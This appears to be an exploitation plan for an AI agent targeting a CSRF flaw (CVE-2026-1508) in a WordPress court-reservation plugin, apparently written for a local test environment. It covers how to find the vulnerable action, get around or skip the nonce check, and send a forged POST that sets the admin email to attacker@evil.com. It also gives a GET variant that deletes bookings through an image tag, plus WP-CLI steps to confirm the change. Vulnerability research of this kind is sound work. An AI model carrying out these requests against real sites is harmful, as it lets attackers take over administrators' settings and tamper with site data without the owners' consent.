Court Reservation – Manage Your Court Bookings Online < 1.10.9 - Cross-Site Request Forgery

This plan outlines the research and exploitation process for CVE-2026-1508, a Cross-Site Request Forgery (CSRF) vulnerability in the Court Reservation plugin for WordPress.

---

1. Vulnerability Summary

The Court Reservation – Manage Your Court Bookings Online plugin (< 1.10.9) fails to implement proper nonce validation on a function responsible for updating plugin settings or performing administrative actions. Consequently, an attacker can craft a malicious request that, when executed by a logged-in administrator (e.g., via a spear-phishing link), performs unauthorized changes to the plugin's configuration, such as modifying booking rules, changing notification emails, or altering global settings.

2. Attack Vector Analysis

• Vulnerable Endpoint: /wp-admin/admin-post.php or /wp-admin/admin-ajax.php.
• Action Hook: Likely registered via admin_post_{action} or wp_ajax_{action}.
  • Inferred Action: cr_save_settings or court_reservation_update_options. (To be verified via grep).
• Vulnerable Parameter: Any state-changing parameter (e.g., cr_email_recipient, cr_booking_slot_duration).
• Authentication: Requires a logged-in Administrator to trigger the request (CSRF).
• Preconditions: The attacker must know the parameter names used in the settings form and the specific action name.

3. Code Flow

1. Entry Point: The plugin registers a handler for administrative actions, typically in the main plugin file or an admin-specific include (e.g., admin/class-court-reservation-admin.php).
   • Code Pattern: add_action( 'admin_post_court_reservation_save_settings', 'save_settings_callback' );
2. Handler Execution: When a POST request is sent to admin-post.php with action=court_reservation_save_settings, the callback function is executed.
3. Missing Check: The callback function likely checks for user capabilities (e.g., current_user_can('manage_options')) but misses a nonce check (e.g., check_admin_referer()).
4. Data Sink: The function proceeds to update the database using update_option() with unsanitized or insufficiently validated data from $_POST.

4. Nonce Acquisition Strategy

This is a CSRF vulnerability where the primary issue is the absence of a nonce check or the use of an incorrect/bypassable nonce.

• If Nonce is Missing: No acquisition is required. The exploit will succeed by simply omitting the nonce parameter.
• If Nonce is "Incorrect" (Bypassable):
  1. Search the source for check_admin_referer or wp_verify_nonce.
  2. If it checks a constant or a fixed string (e.g., wp_verify_nonce($_POST['nonce'], -1)), any nonce generated for the default action -1 will work.
  3. If a nonce is required but only for certain actions, use browser_eval to extract it from the settings page:
     • Navigate to: /wp-admin/admin.php?page=court-reservation-settings (inferred slug).
     • Extract: browser_eval("document.querySelector('input[name=\"_wpnonce\"]')?.value").

5. Exploitation Strategy

The goal is to demonstrate that an unauthenticated attacker can change a plugin setting by tricking an admin.

Step 1: Discover the Target Action and Parameters

• Search the plugin directory for settings forms:
  grep -r "type=\"submit\"" .
grep -r "update_option" .
• Identify the action hidden field in the HTML forms or add_action calls in PHP.

Step 2: Construct the CSRF Exploit
Assuming the action is cr_save_settings and it updates the admin notification email:

• URL: http://vulnerable-wp.local/wp-admin/admin-post.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Body:

  action=court_reservation_save_settings&cr_admin_email=attacker@evil.com&submit=Save+Settings
  

Step 3: Execution via Agent
The agent will use the http_request tool while "acting" as the administrator session (using stored cookies).

6. Test Data Setup

1. Install Plugin: Ensure court-reservation version < 1.10.9 is active.
2. Configuration:
   • Identify the default admin email or a specific setting (e.g., court_reservation_settings).
   • Note the current value: wp option get court_reservation_settings --format=json.

7. Expected Results

• The http_request will return a 302 Redirect (standard for admin-post.php success).
• The database option associated with the plugin settings will be updated to the attacker's value.
• No "Are you sure you want to do this?" (nonce failure) page should appear.

8. Verification Steps

After sending the malicious POST request, verify the change using WP-CLI:

# Check if the specific option was updated
wp option get court_reservation_settings

# Or, if individual options are used:
wp option get cr_admin_email

9. Alternative Approaches

• AJAX Endpoint: If settings are saved via AJAX, the target will be /wp-admin/admin-ajax.php. The body must include the action and any required sub-actions.
  • Payload: action=cr_ajax_save&setting_name=val&security=invalid_nonce
• GET-based CSRF: Check if the handler uses $_REQUEST instead of $_POST. If so, the exploit can be triggered via a simple <img> tag or a link:
  • Payload: /wp-admin/admin-post.php?action=cr_delete_booking&id=1 (No POST required).

---

Note on Identifiers: Actual slugs and parameters must be confirmed by the agent using ls -R and grep upon initial access to the environment, as they vary slightly between plugin versions. Look specifically for court-reservation or court_reservation.